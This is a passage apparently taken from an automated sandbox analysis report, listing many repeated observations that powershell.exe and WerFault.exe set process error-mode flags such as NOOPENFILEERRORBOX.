                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
